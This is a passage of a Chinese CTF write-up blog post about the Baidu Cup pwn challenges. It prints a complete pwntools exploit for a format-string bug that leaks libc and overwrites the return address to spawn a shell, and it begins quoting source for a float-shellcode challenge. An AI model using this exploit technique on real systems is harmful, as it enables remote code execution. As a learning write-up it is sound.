<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Baiudu杯 pwn专场记录 | o0xmuhe&#39;s blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…">
<meta name="keywords" content="CTF Writeup,pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="Baiudu杯 pwn专场记录">
<meta property="og:url" content="http:&#x2F;&#x2F;o0xmuhe.me&#x2F;2016&#x2F;11&#x2F;07&#x2F;Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95&#x2F;index.html">
<meta property="og:site_name" content="o0xmuhe&#39;s blog">
<meta property="og:description" content="前言十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…">
<meta property="og:locale" content="default">
<meta property="og:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;baidu-pwn&#x2F;vuln.png">
<meta property="og:updated_time" content="2016-11-07T09:43:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;blogimg-10065924.cos.myqcloud.com&#x2F;baidu-pwn&#x2F;vuln.png">
  
    <link rel="alternative" href="/atom.xml" title="o0xmuhe&#39;s blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet" />
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">muhe</a></h1>
        </hgroup>

        
        <p class="header-subtitle">control $pc, control the world</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">博客首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                            <li><a href="/frinds">友情链接</a></li>
                        
                            <li><a href="/about">关于我</a></li>
                        
                            <li><a href="/Pwnable-Log">Pwnable</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                            
                                <a class="fl weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                            
                                <a class="fl twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                            
                                <a class="fl rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/1day/" style="font-size: 10px;">1day</a> <a href="/tags/Adobe/" style="font-size: 11.43px;">Adobe</a> <a href="/tags/Adobe-Acrobat-Reader/" style="font-size: 10px;">Adobe Acrobat Reader</a> <a href="/tags/Adobe-Reader/" style="font-size: 11.43px;">Adobe Reader</a> <a href="/tags/Antlr/" style="font-size: 10px;">Antlr</a> <a href="/tags/Apple/" style="font-size: 10px;">Apple</a> <a href="/tags/Bindiff/" style="font-size: 10px;">Bindiff</a> <a href="/tags/C/" style="font-size: 11.43px;">C</a> <a href="/tags/CTF/" style="font-size: 10px;">CTF</a> <a href="/tags/CTF-Writeup/" style="font-size: 10px;">CTF Writeup</a> <a href="/tags/CVE/" style="font-size: 10px;">CVE</a> <a href="/tags/Compilers/" style="font-size: 10px;">Compilers</a> <a href="/tags/ESXi/" style="font-size: 10px;">ESXi</a> <a href="/tags/Frida/" style="font-size: 10px;">Frida</a> <a href="/tags/IDA/" style="font-size: 12.86px;">IDA</a> <a href="/tags/IPC/" style="font-size: 11.43px;">IPC</a> <a href="/tags/LLVM/" style="font-size: 10px;">LLVM</a> <a href="/tags/Linux/" style="font-size: 12.86px;">Linux</a> <a href="/tags/MacOS/" style="font-size: 11.43px;">MacOS</a> <a href="/tags/Mach/" style="font-size: 10px;">Mach</a> <a href="/tags/PANDA/" style="font-size: 10px;">PANDA</a> <a href="/tags/PoC/" style="font-size: 11.43px;">PoC</a> <a href="/tags/Python/" style="font-size: 10px;">Python</a> <a href="/tags/RE/" style="font-size: 10px;">RE</a> <a href="/tags/Snell/" style="font-size: 10px;">Snell</a> <a href="/tags/Study/" style="font-size: 15.71px;">Study</a> <a href="/tags/Surge/" style="font-size: 10px;">Surge</a> <a href="/tags/Symbolic-Execution/" style="font-size: 10px;">Symbolic Execution</a> <a href="/tags/Tools/" style="font-size: 11.43px;">Tools</a> <a href="/tags/UaF/" style="font-size: 10px;">UaF</a> <a href="/tags/Webkit/" style="font-size: 10px;">Webkit</a> <a href="/tags/android/" style="font-size: 10px;">android</a> <a href="/tags/angr/" style="font-size: 11.43px;">angr</a> <a href="/tags/compiler/" style="font-size: 10px;">compiler</a> <a href="/tags/ctf/" style="font-size: 18.57px;">ctf</a> <a href="/tags/ctf-writeup/" style="font-size: 20px;">ctf writeup</a> <a href="/tags/debug/" style="font-size: 10px;">debug</a> <a href="/tags/env-config/" style="font-size: 10px;">env config</a> <a href="/tags/exploit/" style="font-size: 15.71px;">exploit</a> <a href="/tags/frida/" style="font-size: 10px;">frida</a> <a href="/tags/fuzz/" style="font-size: 14.29px;">fuzz</a> <a href="/tags/gdb/" style="font-size: 10px;">gdb</a> <a href="/tags/glibc%E5%86%85%E5%AD%98%E7%AE%A1%E7%90%86/" style="font-size: 10px;">glibc内存管理</a> <a href="/tags/life/" style="font-size: 11.43px;">life</a> <a href="/tags/linux/" style="font-size: 10px;">linux</a> <a href="/tags/linux-kernel/" style="font-size: 12.86px;">linux kernel</a> <a href="/tags/macOS/" style="font-size: 17.14px;">macOS</a> <a href="/tags/mips/" style="font-size: 10px;">mips</a> <a href="/tags/paper/" style="font-size: 10px;">paper</a> <a href="/tags/peach/" style="font-size: 10px;">peach</a> <a href="/tags/pwn/" style="font-size: 15.71px;">pwn</a> <a href="/tags/python/" style="font-size: 10px;">python</a> <a href="/tags/ret-2-dl-resolve/" style="font-size: 10px;">ret 2 dl-resolve</a> <a href="/tags/study/" style="font-size: 12.86px;">study</a> <a href="/tags/tools/" style="font-size: 10px;">tools</a> <a href="/tags/uaf/" style="font-size: 10px;">uaf</a> <a href="/tags/unicorn-engine/" style="font-size: 10px;">unicorn engine</a> <a href="/tags/vuln-analysis/" style="font-size: 10px;">vuln analysis</a> <a href="/tags/wargame/" style="font-size: 11.43px;">wargame</a> <a href="/tags/webkit/" style="font-size: 12.86px;">webkit</a> <a href="/tags/winafl/" style="font-size: 10px;">winafl</a> <a href="/tags/windows-kernel/" style="font-size: 12.86px;">windows kernel</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/%E5%85%B6%E4%BB%96/" style="font-size: 10px;">其他</a> <a href="/tags/%E5%B7%A5%E5%85%B7/" style="font-size: 10px;">工具</a> <a href="/tags/%E6%84%9F%E6%82%9F/" style="font-size: 10px;">感悟</a> <a href="/tags/%E6%84%9F%E6%83%B3/" style="font-size: 10px;">感想</a> <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/" style="font-size: 15.71px;">漏洞分析</a> <a href="/tags/%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" style="font-size: 11.43px;">环境配置</a> <a href="/tags/%E7%BC%96%E8%AF%91%E5%8E%9F%E7%90%86/" style="font-size: 11.43px;">编译原理</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://syclover.sinaapp.com/">Syclover Team</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://weibo.com/u/5376172367">最爱的高老师</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.Ox9A82.com">0x9A82学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://k1n9.me/">K1n9师傅</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy">L3mon</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.xianyusec.com">咸鱼</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://rootclay.com">rootclay</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://v1ct0r.com/">V1ct0r</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://godot.win">Godot学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://hebic.me/">Homaebic学弟</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://iqwq.me">两米的sco4x0</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://zmy.im/">JimmyZhou</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://silic.top/">灭亡叔叔</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://dwx.io">Jason</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="	http://www.0aa.me/">Mosuan</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://whereisk0shl.top">k0sh1</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://winter3un.github.io">WinterSun</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://venenof.com">Venenof</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://r0p.me/">Icemakr</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://bestwing.me/">Swing</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="https://www.hackfun.org/">4ido10n</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.hackersb.cn/">王松_Striker</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/7top/">7top</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.bendawang.site">bendawang</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://yixuankeer.win">前端joker大佬</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.lc4t.me">lc4t</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://www.inksec.cn/">Szrzvdny</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://sixwha1e.github.io/">漂亮的sixwhale小姐姐</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://ctfrank.org">CTF Rank</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://askook.me/">A酱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/idoge.cc">重庆五套房的小葱</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/stone.moe">石头</a>
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="/pi4net.com">邢老师最优秀</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">二进制安全. Member of Syclover. CTFer/INTJ.</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">muhe</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">muhe</a></h1>
            </hgroup>
            
            <p class="header-subtitle">control $pc, control the world</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">博客首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                    <li><a href="/frinds">友情链接</a></li>
                
                    <li><a href="/about">关于我</a></li>
                
                    <li><a href="/Pwnable-Log">Pwnable</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="github" target="_blank" href="https://github.com/o0xmuhe" title="github">github</a>
                    
                        <a class="weibo" target="_blank" href="http://weibo.com/2070174943/" title="weibo">weibo</a>
                    
                        <a class="twitter" target="_blank" href="https://twitter.com/0xmuhe" title="twitter">twitter</a>
                    
                        <a class="rss" target="_blank" href="/atom.xml" title="rss">rss</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-Baiudu杯-pwn专场记录" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/11/07/Baiudu%E6%9D%AF-pwn%E4%B8%93%E5%9C%BA%E8%AE%B0%E5%BD%95/" class="article-date">
      <time datetime="2016-11-07T09:07:19.000Z" itemprop="datePublished">2016-11-07</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Baiudu杯 pwn专场记录
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF-Writeup/" rel="tag">CTF Writeup</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h4 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h4><p>十一月的第一周，百度杯的pwn专场，就去学习了下姿势，更加认识到自己的不足和问题所在，以后努力更正改进~<br>本次比赛一共是3个misc和三个pwn，题目都不难，pwn好像有两个都是原题，但是我只google到了第二个题目…</p>
<a id="more"></a>

<h4 id="1-pwnme"><a href="#1-pwnme" class="headerlink" title="1.pwnme"></a>1.pwnme</h4><pre><code>格式化字符串(x64)</code></pre><p>其实后面还有个bof，fmt和bof的结合可能才是出题人的本意吧(我猜的)。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ checksec pwnme </span><br><span class="line">[!] Couldn&apos;t find relocations against PLT to get symbols</span><br><span class="line">[*] &apos;/home/muhe/Desktop/baidu-pwn1/pwnme&apos;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    No canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE</span><br></pre></td></tr></table></figure>
<ul>
<li>格式化字符串<br><img src="http://blogimg-10065924.cos.myqcloud.com/baidu-pwn/vuln.png" alt=""><br>在输出<code>name</code>和<code>pass</code>的时候会导致这个格式化字符串，可以任意地址读写。</li>
</ul>
<p>但是需要注意</p>
<ul>
<li>x64中fmt 泄露的参数的顺序(<code>RDI-RDX-RCX-R8-R9-stack[0]-stack[1]......</code>)</li>
<li>因为有00截断，所以要格式化的地址放后面( -。- 没错 后入式)</li>
</ul>
<p>本来以为开了 Full RELRO 的情况下 DynELF就不行了，还想着手动去解析出libc基地址然后再搞呢…改了下方式就可以了。<br>在师傅的指导下完成了leak的部分，然后是使用DynELF去泄露system的地址，后面改返回地址为system，然后设置好参数后，ret过去。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># based on joker 's exploit</span></span><br><span class="line">r = remote(<span class="string">"106.75.84.74"</span>, <span class="number">10001</span>)<span class="comment">#pwn</span></span><br><span class="line"><span class="comment">#r = remote("127.0.0.1", 10001)#pwn</span></span><br><span class="line"><span class="comment">#context.log_level = "debug"</span></span><br><span class="line"></span><br><span class="line">read_got = <span class="number">0x0000000000601FC8</span></span><br><span class="line">pop_rdi_ret = <span class="number">0x0000000000400ed3</span></span><br><span class="line">pppr = <span class="number">0x000000000400ECE</span></span><br><span class="line"><span class="comment">#ret addr 0x0000000000400e56</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leak</span><span class="params">(addr)</span>:</span></span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"2"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"aaaa"</span></span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"%12$s"</span>+<span class="string">"AAAAAAA"</span> + p64(addr)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"1"</span>)</span><br><span class="line">    content = r.recvuntil(<span class="string">"AAAAAAA"</span>)</span><br><span class="line">    <span class="keyword">if</span>(len(content) == <span class="number">12</span>):</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"[*] NULL "</span></span><br><span class="line">        <span class="keyword">return</span> <span class="string">'\x00'</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">print</span> <span class="string">"[*]%#x -- &gt; %s"</span> % (addr,(content[<span class="number">5</span>:<span class="number">-7</span>] <span class="keyword">or</span> <span class="string">''</span>).encode(<span class="string">'hex'</span>))</span><br><span class="line">        <span class="keyword">return</span> content[<span class="number">5</span>:<span class="number">-7</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#writebyte</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">writebyte</span><span class="params">(count_byte,addr)</span>:</span></span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"2"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"aaaa"</span></span><br><span class="line">    r.sendline(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">    payload = <span class="string">"%&#123;0&#125;c%12$hhn"</span>.format(count_byte)</span><br><span class="line">    payload += <span class="string">"A"</span>*(<span class="number">12</span>-len(payload)) + p64(addr)</span><br><span class="line">    r.send(payload)</span><br><span class="line">    r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">    r.sendline(<span class="string">"1"</span>)</span><br><span class="line">    r.recvuntil(<span class="string">"\n"</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">"40):"</span>)</span><br><span class="line">r.sendline(<span class="string">"aaa"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"40):"</span>)</span><br><span class="line">r.sendline(<span class="string">"aaa"</span>)</span><br><span class="line"></span><br><span class="line">d = DynELF(leak,elf=ELF(<span class="string">'./pwnme'</span>))</span><br><span class="line">system_addr = d.lookup(<span class="string">'system'</span>,<span class="string">'libc'</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">"[*] system addr:&#123;0&#125;"</span>.format(hex(system_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#leak ret_addr</span></span><br><span class="line">r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"2"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"aaaa"</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"%6$s"</span> <span class="comment">#stack</span></span><br><span class="line">r.send(payload)</span><br><span class="line">r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"1"</span>)</span><br><span class="line">r.recvuntil(<span class="string">"\n"</span>)</span><br><span class="line">content = r.recv(<span class="number">6</span>)</span><br><span class="line">content = content.ljust(<span class="number">8</span>,<span class="string">"\x00"</span>)</span><br><span class="line">stack_addr = u64(content)  <span class="comment"># 0x7ffc23fb85e0</span></span><br><span class="line">stack_while_ret_addr = stack_addr + <span class="number">8</span> - <span class="number">0xb0</span> <span class="comment">#</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">"[*] stack_while_ret addr:&#123;0&#125;"</span>.format(hex(stack_while_ret_addr))</span><br><span class="line"><span class="comment">#leak_ret_addr</span></span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0000| 0x7ffc23fb84f0 --&gt; 0x7ffc23fb8530 --&gt; 0x7ffc23fb85e0 --&gt; 0x400e70 (push   r15)</span></span><br><span class="line"><span class="string">0008| 0x7ffc23fb84f8 --&gt; 0x400d32 (add    rsp,0x30)</span></span><br><span class="line"><span class="string">0016| 0x7ffc23fb8500 --&gt; 0xa61616161 ('aaaa\n')</span></span><br><span class="line"><span class="string">0024| 0x7ffc23fb8508 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0032| 0x7ffc23fb8510 --&gt; 0x7324362500000000 ('')</span></span><br><span class="line"><span class="string">0040| 0x7ffc23fb8518 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0048| 0x7ffc23fb8520 --&gt; 0x0 </span></span><br><span class="line"><span class="string">0056| 0x7ffc23fb8528 --&gt; 0x400d0b (cmp    eax,0x2)</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">writebyte(<span class="number">0xce</span>,stack_while_ret_addr)</span><br><span class="line">writebyte(system_addr &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">8</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">1</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">16</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">2</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">24</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">3</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">32</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">4</span>)</span><br><span class="line">writebyte((system_addr &gt;&gt; <span class="number">40</span>) &amp; <span class="number">0xff</span>,stack_while_ret_addr + <span class="number">0x30</span> + <span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">"2"</span>)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"/bin/sh;"</span> + <span class="string">"AAAAAAAABBB"</span></span><br><span class="line">r.sendline(payload)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"20):"</span>)</span><br><span class="line">payload = <span class="string">"\x00\x00\x00\x00"</span> + p64(pop_rdi_ret) + p64(stack_while_ret_addr + <span class="number">8</span>)</span><br><span class="line"><span class="comment">#raw_input('$ret')</span></span><br><span class="line">r.send(payload)</span><br><span class="line"><span class="keyword">print</span> r.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">r.sendline(<span class="string">'3'</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h4 id="2-loading"><a href="#2-loading" class="headerlink" title="2.loading"></a>2.loading</h4><pre><code>简单粗暴把输入的每个字节 /2333.0 然后直接执行</code></pre><p>浮点数的考察啊…google了下 <code>float shellcode</code>，就找到了原题啊…把别人exp里的1337.0改成2333.0就好了…<br>搜到了<a href="https://j31d0.github.io/writeup/2016/04/18/pctf2016-fixedpoint/" target="_blank" rel="noopener">pctf 2016 fixedpoint writeup</a><br>还有这个 <a href="https://kimiyuki.net/blog/2016/04/18/plaidctf-2016-fixedpoint/" target="_blank" rel="noopener">PlaidCTF 2016 fixedpoint</a></p>
<p>pctf 这个的源码,简直不要再一样好么。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span>** argv)</span> </span>&#123;</span><br><span class="line">  <span class="keyword">float</span>* <span class="built_in">array</span> = mmap(<span class="number">0</span>, <span class="keyword">sizeof</span>(<span class="keyword">float</span>)*<span class="number">8192</span>, <span class="number">7</span>, MAP_PRIVATE|MAP_ANONYMOUS, <span class="number">-1</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">int</span> 